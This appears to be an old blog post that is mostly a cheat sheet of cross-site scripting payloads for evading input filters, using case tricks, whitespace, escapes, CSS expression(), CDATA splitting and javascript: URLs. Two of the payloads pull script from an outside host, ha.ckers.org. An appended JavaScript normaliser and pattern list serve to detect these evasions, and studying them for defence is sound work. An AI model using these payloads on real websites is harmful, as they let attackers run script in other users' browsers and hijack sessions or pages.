Introduction to Cross Site Scripting (XSS) attack techniques

Posted on 2012-12-31 09:59:28
1. Change the character case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Replace the .js extension with another one

    <script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert extra characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or newline to evade filters (the gaps inside "javascript" below are literal tab or newline characters)

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

7. Use "\" to evade filters

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade filters (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Original source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Original source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag

    <body onload="alert('onload')">

        Event handlers: onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. XSS code embedded in an SWF

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it.

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert(&quot;XSS&quot;)</SCRIPT>">

    </BODY></HTML>

13. Write a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href and url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

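The evasions in sections 1, 6, 7, 8 and 14 all defeat filters that pattern-match the raw attribute or CSS value. The normaliser below is an added illustration, not part of the original post: it undoes those obfuscations (case, embedded tabs/newlines, CSS backslash escapes and comments, numeric HTML entities) before classifying the value, and the sample inputs are constructed in the shapes shown above; function names are the example's own.

```javascript
// Added example, not from the original post. Normalise an attribute or CSS
// value before classifying it, so the case, whitespace, backslash-escape,
// CSS-comment and entity tricks listed above no longer hide the scheme.
// A deny-list like this is a detection aid; an allow-list sanitiser is the fix.

function codePointOrEmpty(cp) {
  return cp > 0x10ffff ? '' : String.fromCodePoint(cp);
}

// Decode numeric HTML entities, with or without the trailing ';'
// (section 8 notes the ';' may be dropped).
function decodeHtmlEntities(s) {
  return s
    .replace(/&#x([0-9a-f]{1,6});?/gi, (_, h) => codePointOrEmpty(parseInt(h, 16)))
    .replace(/&#(\d{1,7});?/g, (_, d) => codePointOrEmpty(parseInt(d, 10)));
}

// Undo the CSS tricks of section 7: strip /* comments */, resolve hex
// escapes (\6A ) and drop the backslash from escaped letters (expre\ssion).
function decodeCssEscapes(s) {
  return s
    .replace(/\/\*[\s\S]*?\*\//g, '')
    .replace(/\\([0-9a-f]{1,6})[ \t\n]?/gi, (_, h) => codePointOrEmpty(parseInt(h, 16)))
    .replace(/\\([^0-9a-f])/gi, '$1');
}

// Remove the tab/newline/NUL padding of section 6 and fold case (section 1).
function normalizeValue(value) {
  return decodeCssEscapes(decodeHtmlEntities(value))
    .replace(/[\x00-\x20]+/g, '')
    .toLowerCase();
}

const DANGEROUS_PATTERNS = [
  /^javascript:/,     // src/href/url() sinks of section 14
  /expression\s*\(/,  // IE CSS expression() of sections 7 and 8
];

function isDangerousValue(value) {
  return DANGEROUS_PATTERNS.some((re) => re.test(normalizeValue(value)));
}
// Constructed samples in the shapes shown above (tab and newline are real here).
const SAMPLES = {
  tabNewline: 'jav\tascr\nipt:alert(\'XSS3\')',
  cssEscape: 'xss:expre\\ssion(alert("XSS33"))',
  cssComment: 'xss:expr/*anyword*/ession(alert(\'sss\'))',
  entity: '&#106;&#97;vascript:alert(1)',
  benign: 'http://example.com/logo.jpg',
};
```

The last payload of section 7 (a `/*` opened inside a CSS string literal) depends on the browser's own CSS parser and is not resolved by this normaliser, which is one more reason to prefer an allow-list.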